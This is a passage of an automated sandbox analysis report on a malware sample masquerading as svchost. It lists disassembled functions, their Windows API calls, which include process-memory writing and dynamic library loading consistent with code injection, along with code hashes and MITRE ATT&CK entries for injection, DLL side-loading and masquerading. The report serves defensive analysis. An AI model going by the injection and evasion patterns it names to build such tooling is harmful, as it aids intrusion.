Opcode ID: a22180b871657469462245d63a1df6603a5014c87e756b3b7c6317501a45b5d8
Instruction ID: 958cc02974dd490962601f4e5d7328da3ab7c70f1c6129f948b010f177f26f79
Opcode Fuzzy Hash: a22180b871657469462245d63a1df6603a5014c87e756b3b7c6317501a45b5d8
Instruction Fuzzy Hash: 46519CB2201B8482EA62DF57B9447DA63A1F78CBD4F584129EF8D47BA5DF38C8458740

Function 000000014000AD90 Relevance: 6.4, APIs: 5, Instructions: 143memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,?,?,?,?,00000000,?,?,0000000140007F7E), ref: 000000014000AEF5
HeapFree.KERNEL32(?,?,?,?,?,00000000,?,?,0000000140007F7E), ref: 000000014000AF25

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 408a02f4f63ab91fc5187f14d3dcb37b4e722448c365077d34190373d3d5f0ce
Instruction ID: d4d1870c5087a67c0966be97a260029823248e973845292b3bb07a60e1b23ddb
Opcode Fuzzy Hash: 408a02f4f63ab91fc5187f14d3dcb37b4e722448c365077d34190373d3d5f0ce
Instruction Fuzzy Hash: 7D517CB2201B8586EA52DB56F8403DA63E5F789BD4F448015AF8E47B69CF3CC846C740

Function 0000000140001C20 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 197memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

memset.MSVCRT ref: 0000000140001DDF
HeapFree.KERNEL32 ref: 0000000140001F1E
HeapFree.KERNEL32 ref: 0000000140001F38

Strings

0, xrefs: 0000000140001DCF

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeapmemset
String ID: 0
API String ID: 2097932597-4108050209
Opcode ID: d608044e64b780387b2c7aa90c8eb0b27a45091dae120e6ad878195193090760
Instruction ID: 5a9c4f64bc53c3310fbde631ad91d9e498651b06d97f63ba4cdee06702fb0fd3
Opcode Fuzzy Hash: d608044e64b780387b2c7aa90c8eb0b27a45091dae120e6ad878195193090760
Instruction Fuzzy Hash: 4C910CB2310A8586EB61CF26E8543ED67A0FB88FC9F549026EB4D47B68DF39C549C740

Function 0000000140014540 Relevance: 6.1, APIs: 4, Instructions: 121libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

Part of subcall function 000000014000E0C0: memcpy.MSVCRT ref: 000000014000E285

GetProcAddress.KERNEL32 ref: 00000001400145B6
GetProcAddress.KERNEL32 ref: 00000001400145DC
GetProcAddress.KERNEL32 ref: 0000000140014602
GetProcAddress.KERNEL32 ref: 0000000140014628

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$memcpymemset
String ID:
API String ID: 2623457122-0
Opcode ID: 80d22dda9c92a7dc3ff39ece2696b542829985d415a44d4f58619847b4434d21
Instruction ID: 70dbe746bec5ee3447c0d7f353d4dfd784e5f219e21c1097a21de84af56b6886
Opcode Fuzzy Hash: 80d22dda9c92a7dc3ff39ece2696b542829985d415a44d4f58619847b4434d21
Instruction Fuzzy Hash: C9514736311B4182EB52DB16E8903EA23A1F78CBD4F44422AEB9D477B4DF39C449C740

Function 00000001400164D0 Relevance: 6.1, APIs: 4, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

??2@YAPEAX_K@Z.MSVCRT ref: 00000001400165A5
??3@YAXPEAX@Z.MSVCRT ref: 0000000140016609
HeapFree.KERNEL32 ref: 000000014001665A
HeapFree.KERNEL32 ref: 0000000140016673

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$??2@??3@memset
String ID:
API String ID: 987703202-0
Opcode ID: 4066fb4ad796096cb4f0aa9e0f7ccb1a1a05eebd38f039e7280e541ce6032752
Instruction ID: 56bfb0d7c4714fc23e3e49edf08900e61e95882cce72991227d767f54d68e605
Opcode Fuzzy Hash: 4066fb4ad796096cb4f0aa9e0f7ccb1a1a05eebd38f039e7280e541ce6032752
Instruction Fuzzy Hash: F5419772201B8581EB729F27B8103EB63A5FB8DBC4F444125EF495B7AAEE39C845C740

Function 00000001400130C0 Relevance: 6.1, APIs: 4, Instructions: 110librarymemoryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

GetProcAddress.KERNEL32 ref: 0000000140013166
MultiByteToWideChar.KERNEL32 ref: 000000014001319C
MultiByteToWideChar.KERNEL32 ref: 00000001400131E0
HeapFree.KERNEL32 ref: 000000014001326E

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AddressFreeHeapProcmemset
String ID:
API String ID: 1855896800-0
Opcode ID: 2b06c8bbf3553aec2115b7400860299f7851679e21e5d390be81bfaf3dcb26c1
Instruction ID: e3fb2f7e366e748dc6d962b2961083894d0ca4f4d749cc2a9cf1ff3c065c6bc7
Opcode Fuzzy Hash: 2b06c8bbf3553aec2115b7400860299f7851679e21e5d390be81bfaf3dcb26c1
Instruction Fuzzy Hash: 37414B72204BC185EA61DB16A8507DB63A0F78DBC5F444129EF9D4BBAADF39C505CB00

Function 0000000140004120 Relevance: 6.1, APIs: 4, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

??2@YAPEAX_K@Z.MSVCRT ref: 00000001400041E4
_time64.MSVCRT ref: 000000014000422A
HeapFree.KERNEL32 ref: 000000014000428C

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: ??2@FreeHeap_time64memset
String ID:
API String ID: 665068314-0
Opcode ID: 8b74649592698774aa04cc3df794b495fdbb369b225488a8c13f1aa0cbf406a8
Instruction ID: 3b41cf12a1854ee51030ad2dfde3dce9ab56220ab60abe65fc2278721d7e4742
Opcode Fuzzy Hash: 8b74649592698774aa04cc3df794b495fdbb369b225488a8c13f1aa0cbf406a8
Instruction Fuzzy Hash: 4C4117B6205B8582EB66CF52B4103EA63A4FB88BC0F594126BB89477A6DF38C841C744

Function 000000014000C750 Relevance: 6.1, APIs: 4, Instructions: 92librarymemoryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

LoadLibraryW.KERNEL32 ref: 000000014000C7D3
GetProcAddress.KERNEL32 ref: 000000014000C806
GetLastError.KERNEL32 ref: 000000014000C846
HeapFree.KERNEL32 ref: 000000014000C899

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: AddressErrorFreeHeapLastLibraryLoadProcmemset
String ID:
API String ID: 3226096620-0
Opcode ID: d1715fdb5dddd0d251813e7f8691ff23fd2f0f614da14f1e4099650b5e5ebb2c
Instruction ID: 4ed53ce331cc876d90759824a61a266281903749b9815567c4f8bf6b8516744d
Opcode Fuzzy Hash: d1715fdb5dddd0d251813e7f8691ff23fd2f0f614da14f1e4099650b5e5ebb2c
Instruction Fuzzy Hash: FE314BB1205AC184EA62DF13B8407EB63A0BB8DBC5F444025EF8D577A6EE39C445CB40

Function 000000014000A8F0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,00000000,00000000,0000000140007AF5,?,?,?,000000014000562A), ref: 000000014000A916
rand.MSVCRT ref: 000000014000A923
rand.MSVCRT ref: 000000014000A980

Strings

yxxx, xrefs: 000000014000A92B

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: rand$FreeHeap
String ID: yxxx
API String ID: 3257490382-3567846162
Opcode ID: 1ed65ebdc0ce8e4ce5d2a64fe317f14d270a0097822f3f55ffc6e5b95df04c10
Instruction ID: 68e9f63343866e12a90d5f998d2b8139de06248d58b94c3f77e5065cd01b016c
Opcode Fuzzy Hash: 1ed65ebdc0ce8e4ce5d2a64fe317f14d270a0097822f3f55ffc6e5b95df04c10
Instruction Fuzzy Hash: 9C21E7B2710A4086D756DB17B8103DA66E5F78E7D4F4A9115FF4A0B769EF3CC8808340

Function 0000000140001FA0 Relevance: 6.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 0000000140001FE4
SysFreeString.OLEAUT32 ref: 0000000140001FF3
??3@YAXPEAX@Z.MSVCRT ref: 0000000140001FFC
HeapFree.KERNEL32 ref: 0000000140002030

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$String$??3@Heap
String ID:
API String ID: 4235498366-0
Opcode ID: c12198bd40917f41d5f87fff9c6930f7040eddc6234b709b1659fba2cdf50f37
Instruction ID: f05e54370569ffaa4172b8e709ae349b72a04d2577a779893dc1ca082f76694d
Opcode Fuzzy Hash: c12198bd40917f41d5f87fff9c6930f7040eddc6234b709b1659fba2cdf50f37
Instruction Fuzzy Hash: 36110376204B8086EB56DF52E9903A9B3B4F788FC4F185116EF8A07B69CF39C891C741

Function 0000000140011FE0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 220memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 0000000140012116

Part of subcall function 0000000140013B50: WriteProcessMemory.KERNEL32 ref: 0000000140013BB8

HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 000000014001238C

Part of subcall function 0000000140013B00: ReadProcessMemory.KERNEL32 ref: 0000000140013B25

Strings

@, xrefs: 000000014001210E

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: MemoryProcess$AllocFreeHeapReadVirtualWrite
String ID: @
API String ID: 3931978661-2766056989
Opcode ID: ccd70a0ca5a4c560fc92debafb302037228b4baa55aaef678cfa11071513d053
Instruction ID: 49d5038374c617281847cfa8613ef8dafcb7c1c33cb977380acacb8086e307ba
Opcode Fuzzy Hash: ccd70a0ca5a4c560fc92debafb302037228b4baa55aaef678cfa11071513d053
Instruction Fuzzy Hash: 97A12676205BC085EB629B27E4507EE67A0F788BC4F088425EF8D5BB69EF39C555CB00

Function 00000001400043F0 Relevance: 5.5, APIs: 4, Instructions: 469memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000BD60: GetModuleFileNameW.KERNEL32 ref: 000000014000BDAF
Part of subcall function 000000014000BD60: LoadLibraryA.KERNEL32 ref: 000000014000BDF2
Part of subcall function 000000014000BD60: GetProcAddress.KERNEL32 ref: 000000014000BE14
Part of subcall function 000000014000BD60: GetProcAddress.KERNEL32 ref: 000000014000BE43
Part of subcall function 000000014000BD60: GetProcAddress.KERNEL32 ref: 000000014000BE72
Part of subcall function 000000014000BD60: GetProcAddress.KERNEL32 ref: 000000014000BE9D
Part of subcall function 000000014000BD60: GetProcessHeap.KERNEL32 ref: 000000014000BEAF
Part of subcall function 000000014000BD60: RtlReAllocateHeap.NTDLL ref: 000000014000BECA

Part of subcall function 0000000140002300: CoCreateInstance.COMBASE ref: 0000000140002351

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

HeapFree.KERNEL32 ref: 00000001400045C1
HeapFree.KERNEL32(00000000,00000000,?,000000014000326D), ref: 0000000140004842
HeapFree.KERNEL32 ref: 0000000140004AD6
memcpy.MSVCRT ref: 0000000140004B09

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AddressProc$Free$AllocateCreateFileInstanceLibraryLoadModuleNameProcessmemcpymemset
String ID:
API String ID: 1287873503-0
Opcode ID: 2d1c915d3e61f1fb7c3c85f5494a43be86836c671b25dc83c622586cc8eb53fa
Instruction ID: efac56c58761c5b53cd2b935686c719a5323fa47eacfc037fad2ad30534b96ad
Opcode Fuzzy Hash: 2d1c915d3e61f1fb7c3c85f5494a43be86836c671b25dc83c622586cc8eb53fa
Instruction Fuzzy Hash: DD228FB5700B8585EB62DF22E8503EA23A0F789BD8F448166EB5D477B6DF38C909C744

Function 0000000140008BF0 Relevance: 5.4, APIs: 4, Instructions: 359memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00000001400090D9
HeapFree.KERNEL32 ref: 00000001400090F3
HeapFree.KERNEL32 ref: 000000014000910D
HeapFree.KERNEL32 ref: 0000000140009127

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$memset
String ID:
API String ID: 631287834-0
Opcode ID: 5f052656b4539390a674b9cd562996d9c182f8e0918825306dd2bf5ae976865b
Instruction ID: 0399d008ca01f3e7ae8c4d26418939d543f2c779a5219281a3e46e336b9b5677
Opcode Fuzzy Hash: 5f052656b4539390a674b9cd562996d9c182f8e0918825306dd2bf5ae976865b
Instruction Fuzzy Hash: 53E1C0B660468281EB62DB23F4407EB67A1F798BC8F544026FF8947BA9DB39C941C740

Function 0000000140013B50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32 ref: 0000000140013BB8
VirtualFreeEx.KERNEL32 ref: 0000000140013BE5

Strings

@, xrefs: 0000000140013B7C

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeMemoryProcessVirtualWrite
String ID: @
API String ID: 2227173347-2766056989
Opcode ID: 9a413e4547a8f19bf2b71c811f9e043220cfa0b658f72ae18e561b0f4f9a5e0c
Instruction ID: 55d91dff6a088f6984b8b652fa138d81b5292368ccde077922b963bfd0e4f872
Opcode Fuzzy Hash: 9a413e4547a8f19bf2b71c811f9e043220cfa0b658f72ae18e561b0f4f9a5e0c
Instruction Fuzzy Hash: 47113536308B9081EB618B07A85479AA7A4F78CFD0F488025EF8C87B69EF39C145CB00

Function 0000000140009430 Relevance: 5.2, APIs: 4, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef001dc6a8a34588974efeeab15473d05159a0728a0990e54c085eaf818c73d9
Instruction ID: abf0167f26eaa8b1341e4727f4fb40882108a042724cd5bbc7dba3d4017e7680
Opcode Fuzzy Hash: ef001dc6a8a34588974efeeab15473d05159a0728a0990e54c085eaf818c73d9
Instruction Fuzzy Hash: 47A16EB6215A8085EB62CF27E8447EE67A1F788BC8F14402AEF4D477A9EF39C545C740

Function 0000000140003ED0 Relevance: 5.2, APIs: 4, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000CAF0: HeapFree.KERNEL32(?,?,00000000,000000014000DD66), ref: 000000014000CBAA

HeapFree.KERNEL32 ref: 00000001400040A0
HeapFree.KERNEL32 ref: 00000001400040C2
HeapFree.KERNEL32 ref: 00000001400040E4
HeapFree.KERNEL32 ref: 0000000140004106

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: b108f9f4a893c3e12e67817eb476791b24ba81c44ca3d0697336e7036c249844
Instruction ID: f58b36fc4f80b02d6db5818868401dd8c31dbbb25ea06bc06c998337cc310218
Opcode Fuzzy Hash: b108f9f4a893c3e12e67817eb476791b24ba81c44ca3d0697336e7036c249844
Instruction Fuzzy Hash: B951C3B5701B8281EB63CB13B4147EB22A5FB89BC8F188024FF4D57BA6DE39C9059744

Function 00000001400169F0 Relevance: 5.1, APIs: 4, Instructions: 116memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0000000140016AAF
memcpy.MSVCRT ref: 0000000140016AC4
HeapFree.KERNEL32 ref: 0000000140016B2C
HeapFree.KERNEL32 ref: 0000000140016B6A

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeapmemcpy
String ID:
API String ID: 673829100-0
Opcode ID: 72da0d61fca60a9855a74ed57a38a50fbf2db88a5ba32426b899817a34a2c748
Instruction ID: c92d060d941fca04b38797fdd340357e26ec207b449130a56d7bb1cc0a947dbe
Opcode Fuzzy Hash: 72da0d61fca60a9855a74ed57a38a50fbf2db88a5ba32426b899817a34a2c748
Instruction Fuzzy Hash: 73418E35600B8181EB129B2398503EA62A1FB8CBD8F94C119EF5E5B7B5DF3ACD85C740

Function 0000000140002660 Relevance: 5.1, APIs: 4, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140007230: HeapFree.KERNEL32 ref: 0000000140007308
Part of subcall function 0000000140007230: HeapFree.KERNEL32 ref: 000000014000731D

memcpy.MSVCRT ref: 0000000140002786
HeapFree.KERNEL32 ref: 00000001400027B7
HeapFree.KERNEL32 ref: 00000001400027D1
HeapFree.KERNEL32 ref: 00000001400027EB

Part of subcall function 0000000140007340: memcpy.MSVCRT ref: 0000000140007475

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$memcpy
String ID:
API String ID: 1887603139-0
Opcode ID: e115f566d86e52d7b676b8586eccf910824452cc7cf57d3d669636780f8eff8e
Instruction ID: b21d00c09a7a7cebf341c700073de6dca50953cd70a54a6fcbc8b966eb336d55
Opcode Fuzzy Hash: e115f566d86e52d7b676b8586eccf910824452cc7cf57d3d669636780f8eff8e
Instruction Fuzzy Hash: D7416C76204B8586EB66CF27E8007DA77A4F788BD4F488016AF4C477A9DF38C945CB40

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

